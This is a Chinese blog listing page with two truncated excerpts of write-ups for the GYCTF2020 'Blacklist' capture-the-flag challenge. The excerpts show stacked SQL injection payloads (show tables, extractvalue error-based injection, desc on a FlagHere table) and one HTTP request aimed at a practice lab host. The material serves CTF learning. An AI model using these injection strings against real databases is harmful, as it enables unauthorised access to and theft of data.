526互联

Blacklist

[GYCTF2020]Blacklist

堆叠注入,前面与“[强网杯 2019]随便注”一致,查询到 flag 在FlagHere 表中。 GET /?inject=1'%3bshow+tables%3b%23 HTTP/1.1 Host: 0ebc2b91-75a9-4336-89cc-32c2c89ee4d1.node4.buuoj.c ......
Blacklist GYCTF 2020

[GYCTF2020]Blacklist

原理 堆叠查询 查询表名和表结构的方法 handler的使用 payload: 1' and extractvalue(1,concat(0x7e,database()))--+ 1';show databases;--+ 1';show tables;--+ desc 'FlagHere';--+ ......
Blacklist GYCTF 2020
共2篇  :1/1页 首页上一页1下一页尾页